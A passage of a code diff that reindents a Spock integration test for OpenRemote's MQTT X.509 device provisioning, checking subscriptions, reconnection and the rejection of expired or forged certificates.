+      assert weatherAsset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == device1UniqueId
+    }
 
-        and: "the connected attribute of the provisioned asset should show as connected"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAssetID)
-            assert weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(false)
-        }
+    and: "the connected attribute of the provisioned asset should show as connected"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAssetID)
+      assert weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(false)
+    }
 
-        when: "the connected attribute user name is changed to something invalid"
-        weatherAsset.getAttribute("connected").ifPresent{it.addOrReplaceMeta(new MetaItem<>(MetaItemType.USER_CONNECTED, "invalidUser"))}
-        weatherAsset = assetStorageService.merge(weatherAsset)
+    when: "the connected attribute user name is changed to something invalid"
+    weatherAsset.getAttribute("connected").ifPresent{
+      it.addOrReplaceMeta(new MetaItem<>(MetaItemType.USER_CONNECTED, "invalidUser"))
+    }
+    weatherAsset = assetStorageService.merge(weatherAsset)
 
-        then: "the connected attribute should now be disconnected"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAssetID)
-            assert !weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(true)
-        }
+    then: "the connected attribute should now be disconnected"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAssetID)
+      assert !weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(true)
+    }
 
-        when: "the connected attribute user name is changed to upper case"
-        weatherAsset.getAttribute("connected").ifPresent{it.addOrReplaceMeta(new MetaItem<>(MetaItemType.USER_CONNECTED, PROVISIONING_USER_PREFIX + device1UniqueId.toUpperCase()))}
-        weatherAsset = assetStorageService.merge(weatherAsset)
+    when: "the connected attribute user name is changed to upper case"
+    weatherAsset.getAttribute("connected").ifPresent{
+      it.addOrReplaceMeta(new MetaItem<>(MetaItemType.USER_CONNECTED, PROVISIONING_USER_PREFIX + device1UniqueId.toUpperCase()))
+    }
+    weatherAsset = assetStorageService.merge(weatherAsset)
 
-        then: "the connected attribute should still find the right user and be connected"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find(weatherAssetID)
-                assert weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(false)
-        }
+    then: "the connected attribute should still find the right user and be connected"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAssetID)
+      assert weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(false)
+    }
 
-        when: "the client then subscribes to attribute events for the generated asset and asset events for all assets"
-        def asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-        def assetSubscriptionTopic = "$provisioningConfig.realm/$mqttDevice1ClientId/$DefaultMQTTHandler.ASSET_TOPIC/#".toString()
-        def attributeSubscriptionTopic = "$provisioningConfig.realm/$mqttDevice1ClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/+/$asset.id".toString()
-        List<AssetEvent> assetEvents = new CopyOnWriteArrayList<>()
-        List<AttributeEvent> attributeEvents = new CopyOnWriteArrayList<>()
-        Consumer<MQTTMessage<String>> eventConsumer = { MQTTMessage<String> msg ->
-            def event = ValueUtil.parse(msg.payload, SharedEvent.class).orElse(null)
-            if (event instanceof AssetEvent) {
-                assetEvents.add(event as AssetEvent)
-            } else {
-                attributeEvents.add(event as AttributeEvent)
-            }
-        }
-        device1Client.addMessageConsumer(assetSubscriptionTopic, eventConsumer)
-        device1Client.addMessageConsumer(attributeSubscriptionTopic, eventConsumer)
+    when: "the client then subscribes to attribute events for the generated asset and asset events for all assets"
+    def asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+    def assetSubscriptionTopic = "$provisioningConfig.realm/$mqttDevice1ClientId/$DefaultMQTTHandler.ASSET_TOPIC/#".toString()
+    def attributeSubscriptionTopic = "$provisioningConfig.realm/$mqttDevice1ClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/+/$asset.id".toString()
+    List<AssetEvent> assetEvents = new CopyOnWriteArrayList<>()
+    List<AttributeEvent> attributeEvents = new CopyOnWriteArrayList<>()
+    Consumer<MQTTMessage<String>> eventConsumer = { MQTTMessage<String> msg ->
+      def event = ValueUtil.parse(msg.payload, SharedEvent.class).orElse(null)
+      if (event instanceof AssetEvent) {
+        assetEvents.add(event as AssetEvent)
+      } else {
+        attributeEvents.add(event as AttributeEvent)
+      }
+    }
+    device1Client.addMessageConsumer(assetSubscriptionTopic, eventConsumer)
+    device1Client.addMessageConsumer(attributeSubscriptionTopic, eventConsumer)
 
-        then: "the subscriptions should be in place"
-        conditions.eventually {
-            assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) != null
-            assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) != null
-            assert device1Client.topicConsumerMap.get(assetSubscriptionTopic).consumers.size() == 1
-            assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic).consumers.size() == 1
-            connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-            assert connection != null
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
-        }
+    then: "the subscriptions should be in place"
+    conditions.eventually {
+      assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) != null
+      assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) != null
+      assert device1Client.topicConsumerMap.get(assetSubscriptionTopic).consumers.size() == 1
+      assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic).consumers.size() == 1
+      connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+      assert connection != null
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
+    }
 
-        when: "the client updates one of the provisioned asset's attributes"
-        device1Client.sendMessage(
+    when: "the client updates one of the provisioned asset's attributes"
+    device1Client.sendMessage(
             new MQTTMessage<String>(
                     "$provisioningConfig.realm/$mqttDevice1ClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/customAttribute/${asset.id}",
                     "99"
+                    )
             )
-        )
 
-        then: "the attribute should have been updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id)
-            assert asset.getAttribute("customAttribute").flatMap{it.getValue()}.orElse(0d) == 99d
-        }
+    then: "the attribute should have been updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id)
+      assert asset.getAttribute("customAttribute").flatMap{it.getValue()}.orElse(0d) == 99d
+    }
 
-        and: "the client should have been notified about the attribute change"
-        conditions.eventually {
-            assert attributeEvents.size() == 1
-            assert attributeEvents.get(0).id == asset.id
-            assert attributeEvents.get(0).name == "customAttribute"
-            assert attributeEvents.get(0).value.orElse(0d) == 99d
-        }
+    and: "the client should have been notified about the attribute change"
+    conditions.eventually {
+      assert attributeEvents.size() == 1
+      assert attributeEvents.get(0).id == asset.id
+      assert attributeEvents.get(0).name == "customAttribute"
+      assert attributeEvents.get(0).value.orElse(0d) == 99d
+    }
 
-        when: "the provisioned asset is modified"
-        asset.name = "New Asset Name"
-        asset = assetStorageService.merge(asset)
+    when: "the provisioned asset is modified"
+    asset.name = "New Asset Name"
+    asset = assetStorageService.merge(asset)
 
-        then: "the client should have been notified about the asset change and all attributes should have generated an attribute event"
-        conditions.eventually {
-            assert assetEvents.size() == 1
-            assert assetEvents.get(0).id == asset.id
-            assert assetEvents.get(0).assetName == asset.name
-        }
+    then: "the client should have been notified about the asset change and all attributes should have generated an attribute event"
+    conditions.eventually {
+      assert assetEvents.size() == 1
+      assert assetEvents.get(0).id == asset.id
+      assert assetEvents.get(0).assetName == asset.name
+    }
 
-        when: "another asset's attribute is updated within the system"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "lightSwitch", true))
+    when: "another asset's attribute is updated within the system"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "lightSwitch", true))
 
-        then: "the internal consumer should have been notified"
-        conditions.eventually {
-            assert internalAttributeEvents.find{it.id == managerTestSetup.apartment2LivingroomId && it.name == "lightSwitch" && it.value.orElse(false)} != null
-        }
+    then: "the internal consumer should have been notified"
+    conditions.eventually {
+      assert internalAttributeEvents.find{
+        it.id == managerTestSetup.apartment2LivingroomId && it.name == "lightSwitch" && it.value.orElse(false)
+      } != null
+    }
 
-        and: "the client should not have been notified"
-        conditions.eventually {
-            assert attributeEvents.size() == 1
-        }
+    and: "the client should not have been notified"
+    conditions.eventually {
+      assert attributeEvents.size() == 1
+    }
 
-        when: "the client disconnects"
-        connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-        device1Client.disconnect()
+    when: "the client disconnects"
+    connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    device1Client.disconnect()
 
-        then: "all subscriptions should be removed and the client should be disconnected"
-        conditions.eventually {
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert device1Client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert userAssetProvisioningMQTTHandler.responseSubscribedConnections.isEmpty()
-        }
+    then: "all subscriptions should be removed and the client should be disconnected"
+    conditions.eventually {
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert device1Client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert userAssetProvisioningMQTTHandler.responseSubscribedConnections.isEmpty()
+    }
 
-        and: "the connected attribute of the provisioned asset should show as not connected"
-        conditions.eventually {
-            weatherAsset = assetStorageService.find (weatherAsset.id)
-            assert !weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(true)
-        }
+    and: "the connected attribute of the provisioned asset should show as not connected"
+    conditions.eventually {
+      weatherAsset = assetStorageService.find(weatherAsset.id)
+      assert !weatherAsset.getAttribute("connected").flatMap{it.value}.orElse(true)
+    }
 
-        when: "the client reconnects"
-        device1Client.connect()
+    when: "the client reconnects"
+    device1Client.connect()
 
-        then: "the client should be connected and subscriptions reset"
-        conditions.eventually {
-            assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
-            connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-            assert connection != null
-        }
+    then: "the client should be connected and subscriptions reset"
+    conditions.eventually {
+      assert device1Client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+      assert connection != null
+    }
 
-        and: "the provisioning subscription should be re-instated but the attribute and asset subscriptions should fail"
-        conditions.eventually {
-            assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) == null
-            assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) == null
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
-            connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-            assert connection != null
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert subscribeFailures.size() == 2
-            assert subscribeFailures.contains(assetSubscriptionTopic)
-            assert subscribeFailures.contains(attributeSubscriptionTopic)
-        }
+    and: "the provisioning subscription should be re-instated but the attribute and asset subscriptions should fail"
+    conditions.eventually {
+      assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) == null
+      assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) == null
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
+      connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+      assert connection != null
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert subscribeFailures.size() == 2
+      assert subscribeFailures.contains(assetSubscriptionTopic)
+      assert subscribeFailures.contains(attributeSubscriptionTopic)
+    }
 
-        when: "the client re-authenticates"
-        device1Responses.clear()
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
+    when: "the client re-authenticates"
+    device1Responses.clear()
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
 
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
-            asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-            assert asset != null
-            assert asset instanceof WeatherAsset
-            assert asset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == device1UniqueId
-        }
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
+      asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+      assert asset != null
+      assert asset instanceof WeatherAsset
+      assert asset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == device1UniqueId
+    }
 
-        and: "the connection should be recorded against the provisioning config"
-        conditions.eventually {
-            assert userAssetProvisioningMQTTHandler.provisioningConfigAuthenticatedConnectionMap.get(provisioningConfig.id) != null
-            assert userAssetProvisioningMQTTHandler.provisioningConfigAuthenticatedConnectionMap.get(provisioningConfig.id).size() == 1
-        }
+    and: "the connection should be recorded against the provisioning config"
+    conditions.eventually {
+      assert userAssetProvisioningMQTTHandler.provisioningConfigAuthenticatedConnectionMap.get(provisioningConfig.id) != null
+      assert userAssetProvisioningMQTTHandler.provisioningConfigAuthenticatedConnectionMap.get(provisioningConfig.id).size() == 1
+    }
 
-        when: "the client subscribes again to the asset and attributes"
-        device1Client.addMessageConsumer(assetSubscriptionTopic, eventConsumer)
-        device1Client.addMessageConsumer(attributeSubscriptionTopic, eventConsumer)
+    when: "the client subscribes again to the asset and attributes"
+    device1Client.addMessageConsumer(assetSubscriptionTopic, eventConsumer)
+    device1Client.addMessageConsumer(attributeSubscriptionTopic, eventConsumer)
 
-        then: "the subscriptions should be in place"
-        conditions.eventually {
-            assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) != null
-            assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) != null
-            assert device1Client.topicConsumerMap.get(assetSubscriptionTopic).consumers.size() == 1
-            assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic).consumers.size() == 1
-            connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-            assert connection != null
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
-        }
+    then: "the subscriptions should be in place"
+    conditions.eventually {
+      assert device1Client.topicConsumerMap.get(assetSubscriptionTopic) != null
+      assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic) != null
+      assert device1Client.topicConsumerMap.get(assetSubscriptionTopic).consumers.size() == 1
+      assert device1Client.topicConsumerMap.get(attributeSubscriptionTopic).consumers.size() == 1
+      connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+      assert connection != null
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
+    }
 
-        when: "a second device connects"
-        def deviceNUniqueId = "device2"
-        def deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
-        def deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
-        def mqttDeviceNClientId = UniqueIdentifierGenerator.generateId("deviceN")
-        deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
-        deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
-        deviceNClient.connect()
+    when: "a second device connects"
+    def deviceNUniqueId = "device2"
+    def deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
+    def deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
+    def mqttDeviceNClientId = UniqueIdentifierGenerator.generateId("deviceN")
+    deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
+    deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
+    deviceNClient.connect()
 
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
 
-        when: "the client subscribes to the provisioning endpoints"
-        List<ProvisioningMessage> deviceNResponses = new CopyOnWriteArrayList<>()
-        Consumer<MQTTMessage<String>> deviceNMessageConsumer = { MQTTMessage<String> msg ->
-            deviceNResponses.add(ValueUtil.parse(msg.payload, ProvisioningMessage.class).orElse(null))
-        }
-        deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
+    when: "the client subscribes to the provisioning endpoints"
+    List<ProvisioningMessage> deviceNResponses = new CopyOnWriteArrayList<>()
+    Consumer<MQTTMessage<String>> deviceNMessageConsumer = { MQTTMessage<String> msg ->
+      deviceNResponses.add(ValueUtil.parse(msg.payload, ProvisioningMessage.class).orElse(null))
+    }
+    deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
 
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
 
-        when: "the client publishes an expired but valid x509 certificate that has been signed by the CA stored in the provisioning config"
-        deviceNClient.sendMessage(
+    when: "the client publishes an expired but valid x509 certificate that has been signed by the CA stored in the provisioning config"
+    deviceNClient.sendMessage(
             new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
                     new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device2_expired.pem").text)
-            ).orElse(null))
-        )
+                    ).orElse(null))
+            )
 
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert deviceNResponses.size() == 1
-            assert deviceNResponses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.UNAUTHORIZED
-        }
-
-        when: "the client disconnects"
-        deviceNClient.removeAllMessageConsumers()
-        deviceNClient.disconnect()
-
-        then: "the connection should be removed from the broker"
-        conditions.eventually {
-            assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "another device connects"
-        deviceNResponses.clear()
-        deviceNUniqueId = "device4"
-        deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
-        deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
-        deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
-        deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
-        deviceNClient.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client subscribes to the provisioning endpoints"
-        deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
-
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client publishes a forged x509 certificate that has been signed by a forged CA"
-        deviceNClient.sendMessage(
-                new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device4_forged.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert deviceNResponses.size() == 1
-            assert deviceNResponses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.UNAUTHORIZED
-        }
-
-        when: "the client disconnects"
-        deviceNClient.removeAllMessageConsumers()
-        deviceNClient.disconnect()
-
-        then: "the connection should be removed from the broker"
-        conditions.eventually {
-            assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "another device connects"
-        deviceNResponses.clear()
-        deviceNUniqueId = "device3"
-        deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
-        deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
-        deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
-        deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
-        deviceNClient.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client subscribes to the provisioning endpoints"
-        deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
-
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
-        deviceNClient.sendMessage(
-                new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        conditions.eventually {
-            assert deviceNResponses.size() == 1
-            assert deviceNResponses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)deviceNResponses.get(0)).realm == managerTestSetup.realmBuildingName
-            asset = ((SuccessResponseMessage)deviceNResponses.get(0)).asset
-            assert asset != null
-            assert asset instanceof WeatherAsset
-            assert asset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == deviceNUniqueId
-        }
-
-        when: "the client disconnects"
-        deviceNClient.removeAllMessageConsumers()
-        deviceNClient.disconnect()
-
-        then: "the connection should be removed from the broker"
-        conditions.eventually {
-            assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "the provisioning config is updated to disabled"
-        existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-        device1Responses.clear()
-        connectionStatuses.clear()
-        subscribeFailures.clear()
-        provisioningConfig.setDisabled(true)
-        provisioningConfig = provisioningService.merge(provisioningConfig)
-
-        then: "already connected client that was authenticated should be disconnected, then reconnect and should fail to re-subscribe to asset and attribute events"
-        conditions.eventually {
-            assert connectionStatuses.size() >= 1
-            assert connectionStatuses.get(0) == ConnectionStatus.CONNECTING
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != existingConnection
-            connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-            assert connection != null
-            subscribeFailures.size() == 2
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-        }
-
-        when: "the re-connected client re-authenticates"
-        device1Responses.clear()
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)device1Responses.get(0)).error == ErrorResponseMessage.Error.CONFIG_DISABLED
-        }
-
-        when: "another device re-connects"
-        deviceNResponses.clear()
-        deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
-        deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
-        deviceNClient.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client subscribes to the provisioning endpoints"
-        deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
-
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
-        deviceNClient.sendMessage(
-                new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert deviceNResponses.size() == 1
-            assert deviceNResponses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.CONFIG_DISABLED
-        }
-
-        when: "the client disconnects"
-        deviceNClient.removeAllMessageConsumers()
-        deviceNClient.disconnect()
-
-        then: "the connection should be removed from the broker"
-        conditions.eventually {
-            assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "the provisioning config is updated to enabled"
-        provisioningConfig.setDisabled(false)
-        provisioningConfig = provisioningService.merge(provisioningConfig)
-
-        and: "the already connected device publishes its' valid client certificate"
-        device1Responses.clear()
-        conditions.eventually {
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-        }
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
-            asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-            assert asset != null
-            assert asset instanceof WeatherAsset
-            assert asset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == device1UniqueId
-        }
-
-        when: "a connected device user is disabled and an un-connected device user is disabled"
-        existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-        def device1User = identityService.getIdentityProvider().getUserByUsername(managerTestSetup.realmBuildingName, User.SERVICE_ACCOUNT_PREFIX + PROVISIONING_USER_PREFIX + device1UniqueId)
-        def deviceNUser = identityService.getIdentityProvider().getUserByUsername(managerTestSetup.realmBuildingName, User.SERVICE_ACCOUNT_PREFIX + PROVISIONING_USER_PREFIX + deviceNUniqueId)
-        device1User.setEnabled(false)
-        deviceNUser.setEnabled(false)
